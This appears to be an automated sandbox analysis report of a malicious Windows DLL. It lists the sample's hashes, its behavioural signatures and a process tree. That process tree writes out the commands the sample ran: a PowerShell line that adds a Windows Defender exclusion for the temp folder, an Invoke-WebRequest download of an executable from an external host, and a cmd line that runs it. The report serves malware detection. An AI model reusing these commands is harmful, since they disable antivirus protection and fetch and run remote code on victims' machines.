Analysis
-
max time kernel
81s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-12-2024 15:31
Static task
static1
Behavioral task
behavioral1
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win7-20240903-en
General
-
Target
fccd129f6a5b9d2133d14922a3614f02.dll
-
Size
206KB
-
MD5
fccd129f6a5b9d2133d14922a3614f02
-
SHA1
e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
-
SHA256
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
-
SHA512
c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
-
SSDEEP
3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2648 powershell.exe 2800 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2648 powershell.exe 2800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 3024 wrote to memory of 2724 3024 rundll32.exe 31 PID 2724 wrote to memory of 2392 2724 rundll32.exe 32 PID 2724 wrote to memory of 2392 2724 rundll32.exe 32 PID 2724 wrote to memory of 2392 2724 rundll32.exe 32 PID 2724 wrote to memory of 2392 2724 rundll32.exe 32 PID 2392 wrote to memory of 2648 2392 cmd.exe 34 PID 2392 wrote to memory of 2648 2392 cmd.exe 34 PID 2392 wrote to memory of 2648 2392 cmd.exe 34 PID 2392 wrote to memory of 2648 2392 cmd.exe 34 PID 2724 wrote to memory of 2384 2724 rundll32.exe 35 PID 2724 wrote to memory of 2384 2724 rundll32.exe 35 PID 2724 wrote to memory of 2384 2724 rundll32.exe 35 PID 2724 wrote to memory of 2384 2724 rundll32.exe 35 PID 2384 wrote to memory of 2800 2384 cmd.exe 37 PID 2384 wrote to memory of 2800 2384 cmd.exe 37 PID 2384 wrote to memory of 2800 2384 cmd.exe 37 PID 2384 wrote to memory of 2800 2384 cmd.exe 37 PID 2724 wrote to memory of 292 2724 rundll32.exe 38 PID 2724 wrote to memory of 292 2724 rundll32.exe 38 PID 2724 wrote to memory of 292 2724 rundll32.exe 38 PID 2724 wrote to memory of 292 2724 rundll32.exe 38
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c %temp%/eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
PID:292
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d3cb3ff8f8e0b639ddb3c1426a03ffd7
SHA130cc99b3fa5bbb796715e0a55a66fe6bac3ea9cc
SHA256eae571ebb1223529cefc072731d2a528fd7e825adfb841f5e46ce7fd8ab24c35
SHA5121938be34e9c1be06b19d11aac3af59f0e7b4216d7c7c6956176bfaf1a21fb411e44bc13eb726dc82a3f5bfd7b3633314e7c08645fe9ea21cfd0dc98fcbb0531d